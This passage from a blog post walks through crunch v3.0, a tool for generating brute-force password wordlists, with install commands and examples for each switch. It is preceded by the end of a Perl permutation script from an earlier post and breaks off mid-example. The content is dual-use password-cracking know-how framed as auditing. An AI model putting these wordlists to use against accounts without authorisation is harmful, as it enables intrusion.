<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$s = $per;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$s = $str[0];</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>if($i eq $num) {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$s .= $per;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>$s .= $str[$i];</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>my @st = split //, $s;</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>&permute(($num + 1), @st);</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>} else {</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>&permute(($num + 1), @str);</span><br />
<span style="color: lime;"><span class="Apple-tab-span" style="white-space: pre;"> </span>}</span><br />
<span style="color: lime;">}</span><br />
<br />
<br />
..<br />
..<br />
..<br />
Please leave your comments, suggestions, mocking words of wisdom..etc.. so that the post can benefit from<br />
the vast amount of knowledge out there.</div>
Unknownnoreply@blogger.com56tag:blogger.com,1999:blog-8356530514965708840.post-53274232555462075782011-05-22T20:33:00.020+02:002012-11-28T07:53:55.466+01:00Creating wordlists with crunch v3.0<div dir="ltr" style="text-align: left;" trbidi="on">
<u><b>CRUNCH v3.0 </b></u><br />
<br />
<div style="color: red;">
Warning... this is a looong post, grab a beverage.. ;) Also heavy on images.. <br />
<br /></div>
<u>PRE-INTRO </u><br />
<br />
Since the post on Creating wordlists with crunch v2.4 made in April last year, crunch has gone through<br />
quite a few changes and improvements and bofh28 has now released v3.0 ! (on 16-05-2011) <br />
To make sure that the information on this blog is staying upto date, its time for a new and improved post.<br />
There will be a lot of duplication from my previous post on crunch, but it should then at least<br />
be a more or less full and complete post.<br />
<br />
<i><b><span style="color: red;"></span></b></i>I have tried to follow the alphabetical order of the options and have done a chapter per option/switch.<br />
<i> </i><br />
<i>Please leave comments should the post be lacking information on anything you feel should be included. </i><br />
<br />
<br />
<u>INTRODUCTION</u><br />
<br />
crunch is a tool for creating bruteforce wordlists which can be used to audit password strength.<br />
The size of these wordlists is not to be underestimated, however crunch can make use of patterns to reduce wordlist sizes, can compress output files in various formats and (since v2.6) now includes a message advising the size of the wordlist that will be created, giving you a 3 second window to stop the creation should the size be too large for your intended use.<br />
<br />
<u>The full range of options is as follows ;</u><br />
<b style="color: red;">-b</b> Maximum bytes to write per file, so using this option the wordlist to be created can be split into various<br />
sizes such as KB / MB / GB (must be used in combination with "-o START" switch) <br />
<b style="color: red;">-c</b> Number of lines to write to output file, must be used together with "-o START" <br />
<span style="color: red;"><b>-d</b></span> Limits the number of consecutive identical characters (<i>crunch v3.2</i>)<br />
<b><span class="Apple-style-span" style="color: red;">-e</span></b> Specifies when crunch should stop early (<i>crunch v3.1</i>)<br />
<b style="color: red;">-f</b> Path to the charset.lst file to use, standard location is '/pentest/passwords/crunch/charset.lst <br />
to be used in conjunction with the name of the desired charset list, such as 'mixalpha-numeric-space' <br />
<b style="color: red;">-i</b> Inverts the output sequence from left-to-right to right-to-left<br />
(So instead of aaa, aab, aac, aad etc, output would be aaa baa caa daa)<br />
<b style="color: red;">-l</b> When specifying custom patterns with the -t option, the -l switch allows you to identify which of the characters<br />
should be taken as a literal character instead of a place holder ( <span style="color: yellow;">@,%^</span> )<br />
<b><span style="color: red;">-o</span></b> Allows you to specify the file name / location for the output, e.g. /media/flashdrive/wordlist.txt<br />
<b style="color: red;">-p</b> Prints permutations of the words or characters provided in the command line. <br />
<b style="color: red;">-q</b> Prints permutation of the words or characters found in a specified file<br />
<b style="color: red;">-r</b> Resumes from a previous session, exact same syntax to be used followed by -r<br />
<b style="color: red;">-s</b> Allows you to specify the starting string for your wordlist.<br />
<b style="color: red;">-t</b> Allows you to specify a specific pattern to use. Probably one of the most important functions !<br />
Place holders for fixed character sets are ;<br />
<b><span style="color: yellow;">@</span></b> -- lower case alpha characters<br />
<b style="color: yellow;">, </b> -- upper case alhpa characters<br />
<b style="color: yellow;">%</b> -- numeric characters<br />
<b><span style="color: yellow;">^</span></b> -- special characters (including space) <br />
<b style="color: red;">-u</b> Supresses the output of wordlist size & linecount prior starting wordlist generation. <br />
<b style="color: red;">-z</b> Adds support to compress the generation output, supports gzip, bzip & lzma<br />
<br />
<br />
All the below is done on backtrack 5, <i><b>only tested on the 32bit versions</b></i>.<br />
crunch is not installed by default on BT5 and as yet (22-05-2011) not yet in the repo's.<br />
(When it does hit the repo's I will amend this post to reflect installing from repo's)<br />
<br />
so download from the source at ;<br />
<a href="http://sourceforge.net/projects/crunch-wordlist/">http://sourceforge.net/projects/crunch-wordlist/</a><br />
<u><i style="color: red;">Edit; 29-01-2012</i></u><br />
and install as follows;<br />
<div style="color: lime;">
tar -xvf crunch-3.2.tgz</div>
<div style="color: lime;">
cd crunch3.2/</div>
<div style="color: lime;">
make && make install</div>
<br />
<b><i><u>Edit 12-06-2011</u></i></b><br />
crunch is now available in the BT repositories,<br />
so can download and install on backtrack5 simply by doing a ;<br />
<div style="color: lime;">
apt-get update<br />
apt-get install crunch</div>
<br />
<br />
<div style="color: yellow;">
<b><u>BASIC USAGE AND CHARACTER SETS</u></b></div>
<br />
The default installation directory / path for crunch in backtrack 5 is<br />
<div style="color: lime;">
/pentest/passwords/crunch/</div>
<br />
All the below examples are based on being in the crunch directory <span style="color: yellow;">/pentest/passwords/crunch/</span><br />
To run crunch from outside of crunch's own directory use ;<br />
/pentest/passwords/crunch/crunch [min length] [max length] [ character set] [options]<br />
<i>example from root directory;</i><br />
<div style="color: lime;">
/pentest/passwords/crunch/crunch 8 8 abc + + \!\@\# -t TEST^%,@ -o test.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_ntowndir-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_ntowndir-1.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Basic usage is as follows to print to screen<br />
<div style="color: yellow;">
./crunch [min length] [max length] [character set] [options]</div>
<br />
To write to file use the -o switch ;<br />
<div style="color: yellow;">
./crunch [min length] [max length] [character set] [options] -o filename.txt</div>
<br />
If no character set is defined, then crunch will default to using the lower case alpha character set;<br />
<div style="color: lime;">
./crunch 4 4</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_4-4.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_4-4.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Also any desired character set can be enterered manually in the command line ;<br />
<span style="color: lime;">./crunch 6 6 0123456789ABCDEF</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_6-6HEXU.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_6-6HEXU.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Certain characters will need escaping with a backslash <b><span style="color: red;">\</span></b> ; <br />
<div style="color: lime;">
./crunch 6 6 ABC\!\@\#\$</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_6-6SPEC.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_6-6SPEC.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">
<u><b>CREATING WORDLISTS IN BLOCKS OF A CERTAIN SIZE</b></u></div>
<br />
Using the <b style="color: red;">-b</b> switch, we can tell crunch to create a wordlist which is split into multiple files<br />
of user-specified sizes.<br />
This must be done in conjunction with -o START.<br />
<br />
The size definition can be; kb, mb, gb or kib, mib, gib<br />
kb, mb, and gb are based on the power of 10 (i.e. 1KB = 1000 bytes)<br />
kib, mib, and gib are based on the power of 2 (i.e. 1KB = 1024 bytes).<br />
<br />
The output files will be named after the first and last entry in the wordlists.<br />
<br />
To create a wordlist split into files of not more than 1mb;<br />
<div style="color: lime;">
./crunch 6 6 0123456789 -b 1mb -o START</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_1mb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_1mb.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create a wordlist split in files of no more than 100mb;<br />
<div style="color: lime;">
./crunch 8 8 abcDEF123 -b 100mb -o START</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_100mb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_100mb.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create a wordlist split into files of no more that 10kb;<br />
<div style="color: lime;">
./crunch 4 4 0123456789 -b 10kb -o START</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_10kb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_b_10kb.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create a wordlist split into files of no more than 2gb;<br />
<div style="color: lime;">
./crunch 8 8 0123456789ABCDEF -b 2gb -o START</div>
etc.<br />
etc.<br />
<br />
<br />
<div style="color: yellow;">
<u><b>CREATING WORDLISTS IN BLOCKS OF A CERTAIN LINECOUNT</b></u></div>
(ie. number of passphrases per file)<br />
<br />
Using the <b style="color: red;">-c</b> switch you can have crunch create wordlists which do not contain more than the<br />
specified number of lines.<br />
This must be used in conjunction with -o START.<br />
<br />
To create files containing no more than 200000 (200 thousand) lines (passphrases);<br />
<span style="color: lime;">./crunch 6 6 0123456789 -c 200000 -o START</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_c_200k.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_c_200k.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To create files containing no more that 150000 (150 thousand) lines (passphrases);<br />
<div style="color: lime;">
./crunch 6 6 abcDEF123 -c 150000 -o START</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_c_150k.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_c_150k.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The output files will be named after the first and last entry in the wordlists.<br />
<br />
<br />
<b><span class="Apple-style-span" style="color: yellow;"><u>STOPPING CRUNCH WORDLIST GENERATION AT A PRE-DETERMINED TIME</u></span></b><br />
<br />
Crunch v3.1 is now also released (20-07-2011) and with it comes the new <b><span class="Apple-style-span" style="color: red;">-e</span></b> switch.<br />
<br />
This option allows you to specify when you want the wordlist generation to stop.<br />
<br />
So the below example will start creating the 6 character numeric wordlist, but will stop at 333333 ;<br />
<span class="Apple-style-span" style="color: lime;">./crunch 6 6 -t %%%%%% -e 333333</span><br />
<br />
<br />
<div style="color: yellow;">
<u><b>USING FIXED CHARACTER SETS</b></u></div>
<br />
Crunch also comes with fixed character sets in <i><b>charset.lst</b></i> which is included in the installation.<br />
(also found in directory /pentest/passwords/crunch/ )<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset-1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="499" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset-1.jpg" width="640" /></a></div>
<br />
<br />
<br />
This saves on the typing (and typoes) when dealing with standard character sets.<br />
<br />
To use the fixed characters sets, instead of typing in character sets manually in the command line,<br />
you can use the <b style="color: red;">-f</b> switch to specify which character set we want to use ;<br />
<br />
To use only upper case alpha characters; <br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst ualpha</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_UP.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_UP.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To use only numeric characters ; <br />
<div style="color: lime;">
./crunch 6 6 -f charset.lst numeric</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_num.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="357" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_num.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To use hexidecimal characters (with uppercase alpha values) ;<br />
<div style="color: lime;">
./crunch 8 8 -f charset.lst hex-upper</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_HU.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_HU.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
To use lower case, uppercase, numeric & special characters (beware of the size ! Don't try to save..lol..) ;<br />
<div style="color: lime;">
./crunch 8 8 -f charset.lst mixalpha-numeric-all-space</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_all.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_all.jpg" width="640" /></a></div>
<br />
<br />
<br />
etc.<br />
etc.<br />
<br />
Since v2.7 additional Swedish character support has also been added for our Swedish brethren, nicely contributed by Niclas Kroon.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset_swedish.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="512" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/charset_swedish.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It should be noted that you can easily create your own custom charset by simply including a line in the same format.<br />
If you for instance know that your target has a certain medical condition known as 133tsp34k, and you have an idea of which letters/numbers are usually used (forum posts etc. etc.) , you could simply include an extra line such as ;<br />
<span style="color: lime;"><span style="color: yellow;">1337 = [4bcd3f9hijk1mn0pqr$7uvwxyz]</span> </span><br />
<i>Doubt the above is authentic enough, but I'm sure you get the idea. </i><br />
Then just run in crunch as you would any other charset;<br />
<span style="color: lime;">./crunch 4 4 -f charset.lst 1337</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_1337.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_f_1337.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
See <span style="color: lime;">/pentest/passwords/crunch/charset.lst</span> for all possibilities / charsets currently included.<br />
<br />
<br />
<div style="color: yellow;">
<u><b>INVERTING THE OUTPUT DIRECTION</b></u></div>
Using the <b style="color: red;">-i</b> option will invert the direction in which the wordlist is created, from <i><b>left-to-right</b></i> to <i><b>right-to-left</b></i>.<br />
Note that this does not change the content of the created wordlist, it only changes the intial direction in which it is created.<br />
<br />
<div style="color: lime;">
./crunch 4 4 -i</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_l.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_l.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The -i option can also be used when character sets have been specified, either manually or using the pre-defined charsets.<br />
<div style="color: lime;">
</div>
<span style="color: lime;">./crunch 4 4 -f charset.lst ualpha -i</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_up.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_up.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
or for instance for creating numeric wordlists in an alternative direction ;<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -i</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_num.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_i_num.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If you actually want the wordlist creation to start from the last letter in the alphabet and work backwards, or<br />
work backwards from the last digit in a 10 digit numeric sequence, then you would have to enter the charset manually ; <br />
<div style="color: lime;">
./crunch 4 4 zyxwvutsrqponmlkjihgfedcba</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_alpha.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_alpha.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: lime;">
./crunch 4 4 ZYXWVUTSRQPONMLKJIHGFEDCBA</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_alpha_Up.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_alpha_Up.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: lime;">
./crunch 8 8 9876543210</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_num.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_rev_num.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">
<u><b>CREATING PERMUTATIONS</b></u></div>
<u><br />
</u><br />
Crunch can also be used to create permutations for either ; <br />
> characters / words entered in the command line with the <b style="color: red;">-p</b> switch.<br />
> lines in a wordlist with the <b style="color: red;">-q</b> switch<br />
<br />
Although there is no min/max character setting, this still needs to be entered for both<br />
the -p and -q switch.<br />
<br />
Using the <b><span style="color: red;">-p</span></b> switch you can create permutations of characters or of all words entered in the command line.<br />
Creating permutations of letters (fun for anograms) ;<br />
<div style="color: lime;">
./crunch 1 1 -p abcd</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_abcd.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_abcd.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Creating permutations of lists of words;<br />
<span style="color: lime;">./crunch 1 1 -p bird cat dog</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_wrd.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_wrd.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
As the -p switch can read the input on command line as being letters or words, it MUST be the last option used;<br />
If for instance trying to suppress the size output message using the -u switch and placing the -u switch last, <br />
crunch will see 2 words (<b><i style="color: yellow;">abcd</i> </b>+ <i style="color: yellow;"><b>-u</b></i>) and so will only print out the 2 permutation possibilities as well as actually recognizing the -u switch ; <br />
<span style="color: lime;">./crunch 1 1 -p abcd -u</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_u1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="163" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_u1.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So to ensure the output is as expected, the -p switch <u>MUST</u> always be the last option, and the correct syntax<br />
with the above example would be ;<br />
<div style="color: lime;">
./crunch 1 1 -u -p abcd</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_u2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_p_u2.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Using the <b style="color: red;">-q</b> switch, you can create all possible permutations of words in a text file ;<br />
(as always, beware of the possible size ! This best done on a 'focussed' wordlist)<br />
<br />
As an example, create a small text file with 3 lines and then run crunch over it with the -q option;<br />
<div style="color: lime;">
echo "bird" > test.txt && echo "cat" >> test.txt && echo "dog" >> test.txt</div>
<div style="color: lime;">
./crunch 1 1 -q test.txt</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_q.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_q.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<u style="color: yellow;"><b>RESUMING WORDLIST CREATION AFTER CANCELLATION</b></u><br />
<u><b></b></u><br />
crunch allows a wordlist creation to be stopped and restarted, to do this we use the <b style="color: red;">-r</b> (resume) switch.<br />
For this to work we must type the exact same line followed with the -r switch ;<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -o test.txt</div>
Stop the creation with a Ctrl C, then restart with ;<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -o test.txt -r</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_r.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_r.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
If the wordlist was started from a specific position (see below chapter) then<br />
when resuming the -s switch as well as input must be removed ;<br />
<br />
When using this method, the notification on %% complete will not be accurate. <br />
Also, when resuming, crunch will advise that it is generating xx amount of data and xx number of lines.<br />
This information will not be correct as the calculation process thinks it is resuming from a creation of an entire wordlist, whereas it is of course resuming from a wordlist with a certain startblock. <br />
The below picture probably explains it better.. <br />
<br />
<div style="color: lime;">
./crunch 8 8 0123456789 -s 59999999 -o test.txt</div>
After cancelling with a Ctrl C, resume would then be done with ;<br />
<span style="color: lime;">./crunch 8 8 0123456789 -o test.txt -r</span> <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_r_s.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="356" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/crunch_r_s.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div style="color: yellow;">
<b><u>STARTING FROM A SPECIFIC POSITION</u></b></div>
<br />
If we want to start crunch from a specific position in the wordlist we want to create, we can use the <b><span style="color: red;">-s</span></b><br />
switch to use a specific startblock as starting position for the wordlist.<br />
<br />
For instance, if you started creating a wordlist, but had to cancel and resume on a different disk or HDD space ran out.<br />
The temporary file that crunch uses for the wordlist creation is "<span style="color: yellow;">START</span>" located in the crunch directory<br />
<div style="color: yellow;">
/pentest/passwords/crunch/</div>
<br />
You can check this temporary file for the last couple of entries to allow you to move/rename the temp file START<br />
and restart the wordlist creation without losing the work already done. <br />
<br />
<u><i>example ;</i></u><br />
<div style="color: lime;">
./crunch 7 7 0123456789 -o test.txt</div>
